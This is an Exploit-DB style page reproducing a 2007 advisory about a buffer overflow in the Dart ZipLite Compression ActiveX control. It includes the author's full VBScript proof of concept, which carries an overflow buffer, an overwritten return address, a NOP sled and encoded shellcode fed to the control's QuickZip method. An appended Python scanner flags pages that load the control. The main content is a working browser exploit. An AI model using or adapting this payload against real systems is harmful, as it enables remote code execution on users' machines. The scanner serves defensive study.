Exploit Dart ZipLite Compression 1.8.5.3 - 'DartZipLite.dll' ActiveX Control Buffer Overflow

Exploiter

18 Dec 2022
EDB-ID: 30069
EDB verification: Passed
Author: SHINNAI
Vulnerability type: REMOTE
Platform: WINDOWS
CVE: N/A
Publication date: 2007-05-22
HTML:
source: https://www.securityfocus.com/bid/24099/info

The Dart ZipLite Compression ActiveX control is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Dart ZipLite Compression ActiveX control 1.8.5.3 is vulnerable to this issue; other versions may also be affected. 

<pre> <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/22</b></p></span> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------------------------- <b>Dart ZipLite Compression for ActiveX (DartZipLite.dll v. 1.8.5.3) Local Buffer Overflow Exploit</b> url: http://www.dart.com/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Special thanks to <b><font color=red>rgod</font></b> that found the bug in DartZip.dll for his exploit see <a href="http://retrogod.altervista.org/ie_DartZip_bof.html">http://retrogod.altervista.org/ie_DartZip_bof.html</a> ------------------------------------------------------------------------------------------------- <object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE00D4DD' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe() buff = String(1024, "A") get_EIP = unescape("%EB%AA%3F%7E") buff1 = String(28, "A") nop = String(16, unescape("%90")) shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ 
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + buff1 + nop + shellcode + nop test.QuickZip egg, "default", True, True, "default", 1 End Sub </script> </span></span> </code></pre>
 
Source: www.exploit-db.com
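
A defensive check for the control described above, as an added example that is not part of the original advisory or proof of concept: it scans saved HTML for pages that load the control by the CLSID shown in the proof of concept and call its `QuickZip` method. The function, class and sample names are hypothetical, the sample pages are constructed, and controls created from script by ProgID are not covered.

```python
import re
from html.parser import HTMLParser

# CLSID and method name as they appear in the proof of concept on this page.
VULN_CLSID = "42ba826e-f8d8-4d8d-8c05-14abce00d4dd"
VULN_METHOD = "QuickZip"

# Constructed sample pages, no payload: only the first loads the flagged control.
SAMPLE_HIT = """<object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE00D4DD' id='zip1'></object>
<script language='vbscript'>zip1.QuickZip "a.txt", "out.zip", True, True, "", 1</script>"""
SAMPLE_CLEAN = ("<object classid='clsid:00000000-0000-0000-0000-000000000000' id='x'>"
                "</object><script>x.QuickZip()</script>")


class ControlFinder(HTMLParser):
    """Collects ids of <object> tags that load the control, plus all script text."""

    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            classid = a.get("classid", "").strip().lower()
            # Accept both clsid:XXXX and clsid:{XXXX} spellings.
            if classid.startswith("clsid:") and classid[6:].strip("{} ") == VULN_CLSID:
                self.object_ids.append(a.get("id", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_html(html):
    """Report whether a page loads the control and which object ids call the method."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    script = "\n".join(finder.scripts)
    calls = [oid for oid in finder.object_ids if oid and re.search(
        r"\b%s\s*\.\s*%s\b" % (re.escape(oid), VULN_METHOD), script, re.I)]
    return {"loads_control": bool(finder.object_ids), "calls_method": calls}
```

A page that only loads the control is still worth triage, since the method call can be assembled at run time in ways a static scan will not see.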
